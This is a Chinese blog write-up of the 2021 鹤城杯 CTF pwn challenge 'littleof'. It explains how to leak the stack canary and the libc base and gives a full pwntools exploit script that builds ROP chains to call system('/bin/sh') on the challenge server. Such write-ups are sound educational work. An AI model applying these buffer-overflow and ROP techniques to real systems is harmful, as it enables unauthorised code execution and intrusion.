[2021 鹤城杯]littleof [泄露canary,libc] 总结

已于 2024-06-15 17:22:31 修改
阅读量255 收藏 4
点赞数 2
分类专栏: PWN 文章标签: 网络安全 c语言 python
于 2024-06-15 17:21:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48466156/article/details/139705271
版权

问题

[2021 鹤城杯]littleof

思路

这道题思路其实很明确的:
泄露canary -> 泄露libc -> 泄露canary -> get_sehll
但这道题花了很长的时间,就是因为这里泄露 canary 出现了问题,拿到的 canary 值始终不对,到底后续没法进行,但最离谱的是,报错的地方都在 泄露 libc 的代码处,导致花了很久很久来找该部分的错误,最后发现错误原来在上面(笑),挺好,下次泄露 canary 绝对不会写错!
具体看EXP中两次泄露 canary 写法的不同,换行符是关键:

  • io.sendlineafter():本身会多读入一个换行符,io.recvuntil()掉填充字节之后,还有一个换行符的,所以一定要读入8个字节的 canary,然后将\x0a 给去掉,即可等到正确的 canary
  • io.sendafter()是不会发送换行符的,所以要多读入一个填充字节,将 canary 最低位的 \x00 给覆盖掉才行。

EXP

from pwn import *
from pwn import u64,p64
from LibcSearcher import LibcSearcher
context(log_level = 'debug',arch = 'amd64',os = 'linux')
# node4.anna.nssctf.cn:28415
io = remote('node4.anna.nssctf.cn',28415)
# io = process('./littleof')
elf = ELF('./littleof')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#rop = ROP('./xxx')

# canary
# 注意这里和下面泄露 canary 写法的不同
canary1_num = 0x50 - 0x8
payload = b"a" * canary1_num 
delimiter = b"overflow?"
io.sendlineafter(delimiter,payload)
io.recvuntil(b"a" * canary1_num)
canary = u64(io.recv(8)[1:].rjust(8,b"\x00"))
log.success("Canary: " + (hex(canary)))


# puts
num = 0x50 - 0x8
main_addr = 0x4006e2
ret_addr = 0x40059e
pop_rdi_ret_addr = 0x400863
puts_got_addr = elf.got['puts']
puts_plt_addr = elf.plt['puts']

payload = b"a" * num + p64(canary) + p64(0) + p64(pop_rdi_ret_addr) + p64(puts_got_addr) + p64(puts_plt_addr) + p64(main_addr)

delimiter = b"harder!"
io.sendlineafter(delimiter,payload)
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
log.success("puts_addr: " + (hex(puts_addr)))


# libc = LibcSearcher('puts',puts_addr)
libc_base_addr = puts_addr - 0x80aa0
system_addr = libc_base_addr + 0x4f550
binsh_addr = libc_base_addr + 0x1b3e1a

# canary
canary2_num = 0x50 - 0x8 + 0x1
payload = b"a" * canary2_num
delimiter = b"overflow?"
io.sendafter(delimiter,payload)
io.recvuntil(b"a" * canary2_num)
canary = u64(io.recv(7).rjust(8,b"\x00"))
log.success("Canary: " + (hex(canary)))

# 栈对齐
payload = b"a" * num + p64(canary) + p64(0)  + p64(ret_addr) + p64(pop_rdi_ret_addr) + p64(binsh_addr) + p64(system_addr)

delimiter = b"harder!"
io.sendlineafter(delimiter,payload)
io.interactive()

总结

  • 注意 sendafter 与 sendlineafter 之间差一个换行符(\x0a
  • 泄露 canary 时,要覆盖其最低位的 \x00
  • 切记 canary 是 rbp - 0x8,所以返回地址是在 rbp + 0x8 处,不要忘记覆盖 rbp
思初晨
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NSSCTF [2021 鹤城]littleof
红叶的博客
03-02 673
很显然栈溢出漏洞位于read函数中,buf大小为0x50,而read函数的第三参数,也就是输出/写入/输出的最大的字节长度为0x100,就是2个buf大小的数据。开启 Canary : RBP 位于 0x50 + 0x08,Canary位于0x50 - 0x08,Return Address位于0x50 + 0x16。因为Canary是栈中的一个随机值,我们通过printf泄露Canary,然后将其填充至它本来应该在的位置,就能通过检查。
2021鹤城pwn部分wp
eeeeeight的博客
10-09 2084
littleof 白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
【PWN · ret2libc | Canary】[2021 鹤城]littleof
Mr_Fmnwon的博客
06-08 879
Canary作为经典且基本的栈保护措施,在后期的题目中必然是基本标配。作为新手小白,最初这几次接触有点难受,but多做总结嘛。——ret2libc也依旧不熟练,做总结也是意料之中的事情。不断总结,不断求学。
反思:泄露canary之后一定要记得处理掉多余的东西————[2021 鹤城]littleof
m0_73858054的博客
02-28 796
这是一道libc类型的题目,应该是不难的,月余之前遇到。当时思路什么的都理清楚了,脚本也写出来了,结果死活获取不到shell…最后又重写了一遍才跑成功了。今天又想起来这件事儿,重新捋了一遍。终于是让我找到了原因!现在把这个原因记录下来,惊醒自己千万要注重细节,不要再犯这种错误。
首届“鹤城”河南·鹤壁CTF网络安全挑战赛部分WP
七堇年的博客
12-24 2581
首届“鹤城”河南·鹤壁CTF网络安全挑战赛WP
鹤城PWN几道题的writeup
10-09 574
目录 babyof easyecho littleof onecho babyof #encoding=utf-8 from pwn import * context(os='linux',arch='amd64') fpath='/home/kali/ctf/pwn/ti/hb/babyof/babyof' r = process(fpath) #r = remote("182.116.62.85",21613) elf = ELF(fpath) libc =elf.libc poprd
首届"鹤城"CTF网络安全挑战赛 - 初赛writeup
渗透测试研究中心
12-22 1930
WEB1.middle_magic%0a绕过第一关最后加%23是#数组绕过第二关json 弱类型比较http://182.116.62.85:20253/?aaa=%0apass_the_level_1%23POST:admin[]=1&root_pwd[]=2&level_3={"result":0}flag{f03d41bf6c8d55f12324fd57f7a00427}2...
Canary机制及绕过策略-格式化字符串漏洞泄露Canary
01-27
由于实验仅启用了Canary,可能存在多种解题方法,如经典的栈溢出利用,也可以通过泄露Canary值来实现。 最后,实验验证了输入`whoami`命令时,如果成功绕过Canary,将返回root用户,这意味着攻击者已获得交互式的...
HttpCanary.pem证书
07-26
安装HttpCanary之后,需要安装证书,有些手机需要在设置里自行安装,需要导入此文件进行安装。
HttpCanary_3.3.6.zip
04-29
HttpCanary是一款强大的网络封包分析工具,专为Android用户设计,用于监控和抓取应用程序与服务器之间的HTTP和HTTPS通信。在标题“HttpCanary_3.3.6.zip”中,我们可以推断出这是HttpCanary软件的一个特定版本,即...
HttpCanary高级版.apk
11-28
HttpCanary高级版
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8374
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
河南萌新联赛2024第(四)场:河南理工大学 C 岗位分配 I 马拉松
2301_81692739的博客
08-08 1052
其实也就是数学中的组合数,赛事一直在推如何组合,最终主要思路是分配1…x 和 y之间的节点需要忽略,所以用cnt这个数组累加,两个点都能到就不考虑,在bfs中,遇到目标节点,跳过,防重。既然用隔板法,也就是,在空位上插板,板子不能插到同一个位置,总要分隔物品。m个志愿者,n个岗位,每个岗位至少a[i]个志愿者,求几种分配方式。,那么每两个板子至少有一个球。
OD C卷 - 掌握单词的个数
weixin_45228198的博客
08-06 229
python算法,数据结构
密码输入检测(100%用例)D卷(Java&&Python&&C++&&Node.js&&C语言)
最新发布
荆赫同艺的博客
08-09 52
给定用户密码输入流 input,输入流中字符'<'表示退格,可以清除前一个输入的字符,请你编写程序,输出最终得到的密码字符,并判断密码是否满足如下的密码安全要求。输出经过程序处理后,输出的实际密码字符串,并输出改密码字符串是否满足密码安全要求。用一行字符串表示输入的用户数据,输入的字符串中'<'字符标识退格,用户输入的字符串不包含空白字符,例如:ABC。注意空串退格后仍然为空串,且用户输入的字符串不包含'<'字符和空白字符。1.对输入的密码进行退格处理,这显然可以使用栈来完成。1.密码长度>=8;
C语言中的预处理简单介绍
weixin_45805339的博客
08-06 346
宏定义允许使用文本替换的方式定义常量和宏函数。常量宏:定义常量。#define PI3.14159带参数的宏函数:定义宏函数,参数会进行替换。使用示例#define PI3.14159return 0;return 0;return 0;return 0;return 0;return 0;return 0;return 0;#undef可以用于取消之前定义的宏。100__FILE__:当前源文件的名称。__LINE__:当前行号。__DATE__
河南萌新联赛2024第(四)场:河南理工大学 B C D F H I
2302_80423900的博客
08-08 701
剩下恶魔中编号最小的恶魔将会成为新的恶魔老大,然后重新按照上述规则,重新由新的恶魔老大提出新的方案进行操作,直到剩下最后一个恶魔或者有一个恶魔老大的方案被同意执行,那么分配结束。现在让你作为编号为1的恶魔,你是恶魔老大,请问聪明的你要怎么样才能让自己在不被杀死的情况下获得最多的金币呢。编号最小的恶魔就是恶魔老大。根据恶魔之间的规则,在分配财宝的时候,将会由恶魔老大提出分配方案。每一个恶魔都非常的贪婪,渴望得到尽可能多的金币,同时每一个恶魔又都非常的狡猾,他们都会选择对自己最有利的情况进行投票。
canary3 利用格式化漏洞泄露canary 利用ROP执行shell
06-09
您的问题是关于利用格式化漏洞泄露canary并利用ROP执行shell的问题。 首先,格式化漏洞是一种常见的安全漏洞,可以通过控制格式化字符串的方式来读取和修改内存中的数据。其中,canary是一种用于防御缓冲区溢出攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值